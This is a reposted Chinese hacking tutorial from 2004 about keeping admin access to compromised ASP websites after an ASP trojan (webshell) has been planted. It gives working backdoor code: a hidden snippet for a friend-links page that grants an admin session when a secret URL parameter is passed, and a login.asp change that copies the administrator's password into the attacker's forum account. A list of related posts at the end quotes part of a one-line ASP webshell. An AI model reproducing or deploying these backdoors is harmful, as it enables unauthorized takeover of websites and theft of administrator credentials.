巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)

原创 2004年11月02日 13:24:00

作者:aweige    来自:中国黑客红色军团

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,呵呵............但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow
me............
session欺骗篇
首先简单说一下一般asp系统的身份验证原理。
一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。
知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。
动力文章系统3.51,(图一)

图一
其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。
我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp
,其验证内容如下:
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
   rs("LastLoginTime")=now()
   rs("LoginTimes")=rs("LoginTimes")+1
   rs.update
   session.Timeout=SessionTimeout
   session("AdminName")=rs("username")
   rs.close
   set rs=nothing
   call CloseConn()
   Response.Redirect "Admin_Index.asp"
前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:

看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin"  ‘这里是假设的,实际操作中可以改成你想要得管理员账号
end if
我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二:

图二
看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三:

图三
呵呵,别做坏事哦............
小结一下:我们先找到弄到管理员账号,然后找到它的验证页面,根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式,比如青创文章系统它不但要验证你的用户名还要验证等级,但是我们总体思路还是一样,就是他验证什么我们就加入什么。
 
密码窃探篇
可以说上述方法在动网论坛或者其他论坛面前是苍白无力的,因为一般论坛由于交互性较强,所以在验证上考虑了很多。以动网为例,你要登录后台,他先验证你有没有先登录了前台,没有的话就给你返回一个错误页面。你登录前台后系统会给你一个seession来记录你的CacheName和你的ID,然后在你登录后台的时候拿出来比较你前后台身份是否一致,一直就通过,否则kill,面对这样严格的验证,难道我们就没有办法基后台了吗?对,没有了(谁拿鸡蛋扔我?这么浪费。),但是我们可以想新的办法,既然验证这么严格,那么我如果拿着密码光明正大的进去呢?因此,这里一个新的思路就是拿到它的明文密码。什么时候有明文密码呢?对了,就在管理员登录的时候。好,我们就在那里做手脚,把它登录的密码发给我们,然后我们拿和它的密码去登录。呵呵,是不是很像sniffer啊?在下在前几个月刚和好兄弟潜龙在野利用硬件sniffer配合省网安局的人端掉一个非法电影网站,足足4000G的硬盘,几十台服务器,一个字:爽
好了,我们开始修改它的程序。编辑login.asp,加入以下几句话:
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username='"& request("username")&"') where
UserName='aweige'"
conn.execute(sql)
end if
end if
 
 
这几句话的意思就是说如果admin(假设的,实际操作中改为你要的管理员名字)登录成功就更新数据库,把他的密码放到我资料的E-mail中。当然,你必须先在论坛里注册一个用户名。结果如图四:

图四
还有,如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样,所以实际操作中不可生搬硬套。
 
后记:
对于以上两种方法直到目前为止我还想不出任何比较有效的解决方法,因为你的网站被人家放了马,你根本就没办法去阻止人家去插入,要是谁有好的解决方法记得告诉我。QQ:289509785
另外,希望大家不要去搞破坏,那时我真的不愿看到的,也祝所有的网管们好运,希望你们不会碰上craker们。

巧妙配合asp木马取得管理权限 (1)

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵...
  • maierken
  • maierken
  • 2006年05月25日 23:34
  • 478

怎么利用asp木马取得管理权限

前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵...
  • u012971242
  • u012971242
  • 2013年11月27日 11:51
  • 649

ASP木马提升权限的N种方法

ASP木马提升权限的N种方法Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术一、Serv-U提权    OK,看看他的PROGRAME里面有些什...
  • meiyouhuiyi
  • meiyouhuiyi
  • 2006年07月19日 20:08
  • 1945

不多说了

至从换了工作,并且莫名其妙的决定发奋图强后,我的日子就只能用艰难来形容了。每天6点钟起床收拾自己,6点半出门,一路上还边走边看英语,堕落鸟,:bs muxue往常呢,装出一副两耳不问窗外事,两眼不看大...
  • no_mIss
  • no_mIss
  • 2006年05月13日 14:48
  • 1249

关于ASP木马提升权限

来源: http://www.17nc.com/现在ASP木马是漫天飞,我有一次进去后发现竟然用30多个ASP木马,在帮管理员清理了后,真是累爬了。想想管理员还真是懒的可以……上传了ASP木马之后,如...
  • psyl
  • psyl
  • 2005年03月16日 08:05
  • 4103

ASP一句话木马大全

"" Then Execute(Request("MH"))%> ""then session("MH")=request("MH"):end if:if session("MH") execut...
  • eldn__
  • eldn__
  • 2012年12月30日 10:35
  • 7179

分析经典的木马

虽然不是原创,但也是自己整理的哈 以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生”网络小组的作品,它可以运行于WIN98,WIN98SE,WINM...
  • u011930673
  • u011930673
  • 2017年11月22日 17:09
  • 76

asp一句话木马原理

一句话木马入侵原理 是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件。  仔细观察一下这句代码,括号里的“#”是我们一句话的密码,我们可以把它改成任意字符,这样可以...
  • JackLiu16
  • JackLiu16
  • 2017年11月10日 16:53
  • 347

一个典型的ASP木马程序源码

Response.Write ("欢迎您");mypass="chinait"if request("userpass")=mypass thensession("admin")=mypassend ...
  • Beyond2007
  • Beyond2007
  • 2007年02月26日 16:26
  • 1702

asp木马中的cmd执行

        以前一直看不懂asp木马中的cmd命令执行。当时如果默认的系统是有可执行属性的话,肯定是不必修改,直接在命令行中写入命令即可,但是如果对方系统的cmd是没有权限的,这时需要我们上传一个...
  • liswa
  • liswa
  • 2006年03月24日 12:17
  • 2077
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)
举报原因:
原因补充:

(最多只允许输入30个字)